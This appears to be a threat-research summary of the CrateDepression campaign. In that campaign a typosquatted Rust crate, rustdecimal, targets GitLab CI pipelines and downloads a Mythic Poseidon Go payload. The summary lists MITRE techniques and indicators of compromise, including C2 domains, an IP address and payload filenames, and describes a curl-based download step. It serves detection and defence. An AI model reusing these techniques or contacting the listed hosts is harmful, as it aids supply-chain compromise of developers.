Threat Research

CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware

Securonix

CrateDepression is a Rust crate supply-chain attack targeting Rust developers and GitLab CI pipelines, using a typosquatted dependency (rustdecimal) to drop a second-stage Go-based payload built on Mythic Poseidon. The campaign could enable larger-scale supply-chain intrusions by infecting cloud-based CI environments and impersonating a known Rust developer to seed tainted code sources. #CrateDepression #rustdecimal #GitLabCI #Poseidon #Mythic #cratesio

Keypoints

  • CrateDepression targets the Rust community via a malicious rustdecimal crate that typosquats the legitimate rust_decimal package.
  • The malware inspects environments for GitLab CI usage by checking the GITLAB_CI variable to identify CI pipelines.
  • On infected hosts, a second-stage payload written in Go is downloaded and executed, using the Mythic post-exploitation framework (Poseidon) as the agent.
  • The campaign is designed to enable broader supply-chain attacks by leveraging infected GitLab CI pipelines to reach downstream targets.
  • Attackers impersonate a known Rust developer to poison the supply chain and encourage downstream compromises through tainted source code.
  • Second-stage payloads reach out to a C2 domain (api.kakn.li) and offer tasking capabilities (e.g., persistence, keylogging, screencapture) on Linux and macOS via Mythic Poseidon.

MITRE Techniques

  • [T1195] Supply Chain Compromise – Malicious crate typosquats against rust_decimal and impersonation of a known Rust developer to poison the well; “The malicious dependency checks for environment variables that suggest a singular interest in GitLab Continuous Integration (CI) pipelines.”
  • [T1036] Masquerading – Impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency; “impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency and sets off the infection chain.”
  • [T1027] Obfuscated/Compressed Data – The code is lightly obfuscated with a five byte XOR key; “a five byte XOR key.”
  • [T1105] Ingress Tool Transfer – The downloader uses curl to fetch the payload and save it to /tmp/git-updater.bin; “uses a curl request to download the payload and save it to /tmp/git-updater.bin.”
  • [T1543.003] Create or Modify System Process: Launch Daemon/Launch Agent – macOS persistence via LaunchAgent/Daemon and LoginItem; “persist by either or both of a LaunchAgent/Daemon and a LoginItem.”
  • [T1071.001] Web Protocols – The second-stage payload initiates communication with a C2 (https://api.kakn.li) and supports tasking; “profile.Start() then initiates communication with the C2” and “The payload contains a switch with a large array of tasking options… https://api.kakn[.]li.”

Indicators of Compromise

  • [Domain] api.kakn.li – C2 domain used by the Poseidon payload for tasking and control
  • [IP] 64.227.12.57 – IP address that api.kakn.li resolves to for C2 communications
  • [Domain] githubio.codes – hosting domain referenced by the downloader URLs used in the infection chain
  • [Filename] rustdecimal-1.22.0.crate.tar.gz – example malicious crate filename
  • [Filename] rustdecimal-1.23.0.crate.tar.gz – another malicious crate filename
  • [Filename] README.bin – Mach-O second-stage payload filename
  • [Filename] READMEv2.bin – ELF second-stage payload filename

Read more: https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/